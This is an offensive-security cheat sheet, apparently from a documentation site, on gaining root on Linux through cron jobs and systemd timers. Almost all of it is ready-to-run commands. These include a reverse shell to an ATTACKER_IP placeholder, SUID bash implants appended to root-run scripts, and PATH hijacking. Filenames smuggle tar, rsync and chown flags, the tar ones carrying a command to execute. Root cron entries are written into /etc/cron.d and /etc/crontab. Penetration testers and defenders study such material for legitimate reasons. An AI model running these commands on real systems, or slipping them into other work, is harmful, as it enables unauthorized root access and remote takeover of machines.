> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Cron Jobs

> Privilege escalation via cron jobs: writable scripts, PATH hijacking, wildcard injection, and systemd timers.

## Enumerate Cron Jobs

```bash theme={"dark"}
crontab -l
cat /etc/crontab
ls -la /etc/cron.d/
ls -la /etc/cron.daily/
ls -la /etc/cron.hourly/
cat /var/spool/cron/crontabs/* 2>/dev/null
```

### Watch for Cron Execution (pspy)

```bash theme={"dark"}
./pspy64
```

Look for commands run by UID 0 (root).

***

## Writable Cron Scripts

If a cron job runs a script as root and you can write to it:

### Check Permissions

```bash theme={"dark"}
ls -la /path/to/cron-script.sh
```

### Inject Reverse Shell

```bash theme={"dark"}
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /path/to/cron-script.sh
```

### Inject SUID bash

```bash theme={"dark"}
echo 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' >> /path/to/cron-script.sh
```

Wait for cron → then:

```bash theme={"dark"}
/tmp/rootbash -p
```

***

## PATH Hijacking

If `/etc/crontab` has a writable directory in PATH before system dirs:

```bash theme={"dark"}
# Example /etc/crontab:
# PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin
# * * * * * root backup.sh
```

If cron calls `backup.sh` without full path and `/home/user` is writable:

```bash theme={"dark"}
echo '#!/bin/bash' > /home/user/backup.sh
echo 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' >> /home/user/backup.sh
chmod +x /home/user/backup.sh
```

***

## Wildcard Injection

### tar Wildcard

If cron runs:

```bash theme={"dark"}
cd /home/user && tar czf /tmp/backup.tar.gz *
```

The `*` expands filenames as arguments. Create files that become tar flags:

```bash theme={"dark"}
echo '' > '/home/user/--checkpoint=1'
echo '' > '/home/user/--checkpoint-action=exec=sh shell.sh'
echo '#!/bin/bash' > /home/user/shell.sh
echo 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' >> /home/user/shell.sh
chmod +x /home/user/shell.sh
```

### rsync Wildcard

If cron runs:

```bash theme={"dark"}
rsync -a /home/user/* /backup/
```

```bash theme={"dark"}
echo '' > '/home/user/-e sh shell.sh'
echo '#!/bin/bash' > /home/user/shell.sh
echo 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' >> /home/user/shell.sh
chmod +x /home/user/shell.sh
```

### chown Wildcard

If cron runs:

```bash theme={"dark"}
chown root:root /home/user/*
```

```bash theme={"dark"}
echo '' > '/home/user/--reference=/etc/passwd'
```

***

## Writable Cron Directory

If `/etc/cron.d/` is writable:

```bash theme={"dark"}
echo '* * * * * root cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' > /etc/cron.d/privesc
```

***

## Systemd Timers

```bash theme={"dark"}
systemctl list-timers --all
```

Check service file for writable script:

```bash theme={"dark"}
systemctl cat <timer-name>.service
```

If ExecStart points to writable file → inject payload.

***

## Overwrite /etc/crontab

If `/etc/crontab` is writable:

```bash theme={"dark"}
echo '* * * * * root /tmp/shell.sh' >> /etc/crontab
```
